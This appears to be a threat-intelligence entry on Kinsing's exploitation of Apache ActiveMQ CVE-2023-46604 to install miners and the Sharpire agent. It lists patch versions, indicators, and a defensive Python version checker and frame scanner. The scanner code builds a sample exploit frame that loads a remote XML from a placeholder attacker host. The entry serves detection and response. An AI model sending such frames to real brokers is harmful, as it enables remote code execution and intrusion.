Case of ActiveMQ Vulnerability Exploitation to Install Sharpire (Kinsing)

Oct. 31, 2025, 10:56 a.m.

Description

The Kinsing threat actor continues to distribute malware by exploiting known vulnerabilities, in this case CVE-2023-46604, a remote code execution flaw in the OpenWire protocol handler of Apache ActiveMQ. The actor targets both Linux and Windows systems and deploys several payloads, including the XMRig cryptocurrency miner, Stager, and Sharpire (a C# implementation of the PowerShell Empire agent). The attack chain begins with exploitation of the ActiveMQ vulnerability to execute commands remotely, followed by installation of downloaders and the use of CobaltStrike, Meterpreter, and PowerShell Empire to control infected systems. The actor's main objectives are cryptocurrency mining and information theft, with ransomware deployment a possible follow-on. The same vulnerability has also been exploited by other groups, including Andariel and the HelloKitty and Mauri ransomware operators. Organizations running Apache ActiveMQ should upgrade to a patched release (5.15.16, 5.16.7, 5.17.6, 5.18.3 or later) and restrict network access to the OpenWire listener (61616/tcp by default) to trusted clients.
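As an added example (not code from the original report or from the Kinsing analysis it summarises), the Python helper below performs two checks a responder would want after reading this entry: whether an ActiveMQ version string falls inside the ranges affected by CVE-2023-46604 (first fixed in 5.15.16, 5.16.7, 5.17.6 and 5.18.3), and whether a captured OpenWire frame carries the publicly known exploit marker for this CVE, an ExceptionResponse naming Spring's ClassPathXmlApplicationContext together with a remote XML URL. The sample frame is constructed here in a simplified layout rather than a byte-exact OpenWire encoding, the host attacker.example is a placeholder, and treating end-of-life 5.x branches below 5.15 as affected is an assumption made for conservative triage.

```python
import re

# First fixed patch level on each affected 5.x branch, per the Apache advisory
# for CVE-2023-46604 (5.15.16, 5.16.7, 5.17.6, 5.18.3).
FIXED_PATCH_BY_MINOR = {15: 16, 16: 7, 17: 6, 18: 3}

# Marker from the widely published exploit pattern for this CVE: the attacker
# sends an OpenWire ExceptionResponse whose Throwable class is a Spring context
# class that loads bean definitions from a remote XML URL.
EXPLOIT_CLASS = b"org.springframework.context.support.ClassPathXmlApplicationContext"
# Printable-ASCII URL; in a real frame this may over-capture trailing printable
# bytes, so treat the result as a lead, not an exact IoC.
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def parse_version(version: str) -> tuple:
    """Turn '5.18.2' into (5, 18, 2); tolerates a trailing qualifier like '-SNAPSHOT'."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(version: str) -> bool:
    """True if this ActiveMQ release is affected by CVE-2023-46604."""
    major, minor, patch = parse_version(version)
    if major >= 6:
        return False  # 6.0.0 and later shipped with the fix
    if major < 5 or minor < 15:
        # Assumption: end-of-life branches never received the fix; treat as affected.
        return True
    fixed = FIXED_PATCH_BY_MINOR.get(minor)
    if fixed is None:
        return True  # 5.x branch not in the advisory table; be conservative
    return patch < fixed


def scan_openwire_frame(frame: bytes) -> dict:
    """Flag a frame carrying the exploit marker and pull out any URL embedded in it."""
    marker = EXPLOIT_CLASS in frame
    urls = [u.decode("ascii") for u in URL_RE.findall(frame)]
    return {"exploit_marker": marker, "urls": urls, "suspicious": marker and bool(urls)}


def build_sample_frame(class_name: bytes, message: bytes) -> bytes:
    """Constructed stand-in for a captured ExceptionResponse frame (simplified, not a
    byte-exact OpenWire encoding): 4-byte length, 1-byte command type 31
    (EXCEPTION_RESPONSE), then two Java writeUTF-style strings."""
    def utf(s: bytes) -> bytes:
        return len(s).to_bytes(2, "big") + s
    body = b"\x1f" + utf(class_name) + utf(message)
    return len(body).to_bytes(4, "big") + body


if __name__ == "__main__":
    for v in ("5.18.2", "5.18.3", "5.15.15", "6.0.0"):
        print(f"ActiveMQ {v}: {'AFFECTED' if is_vulnerable_version(v) else 'fixed'}")
    # Constructed sample traffic: one exploit attempt, one ordinary broker error.
    attack = build_sample_frame(EXPLOIT_CLASS, b"http://attacker.example/poc.xml")
    benign = build_sample_frame(b"java.lang.Throwable", b"broker is shutting down")
    print(scan_openwire_frame(attack))
    print(scan_openwire_frame(benign))
```

Run the version check against whatever the broker reports in its admin console or startup log, and feed captured 61616/tcp payloads to the frame scanner; a hit on the exploit marker plus a URL is the point at which the downloader stage described above would be fetched, so the extracted URL is what to pivot on.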

Date

  • Created: Oct. 31, 2025, 9:30 a.m.
  • Published: Oct. 31, 2025, 9:30 a.m.
  • Modified: Oct. 31, 2025, 10:56 a.m.

Indicators

  • 6c2264eadf779f188a04ea5c9b1f9a1a20ab0e86eea6e42af954182ded7dba5d
  • 2559ce9237bf88f3d9d4b51a45211f8d891ab5cd10317d406dc3827d72267ed6
  • 0c748b9e8bc6b5b4fe989df67655f3301d28ef81617b9cbe8e0f6a19d4f9b657
  • gloryweb.vip

Attack Patterns

  • Stager
  • Sharpire
  • CobaltStrike
  • Meterpreter
  • XMRig
  • Kinsing

Additional Information

  • Korea, Democratic People's Republic of
  • Korea, Republic of

Linked vulnerabilities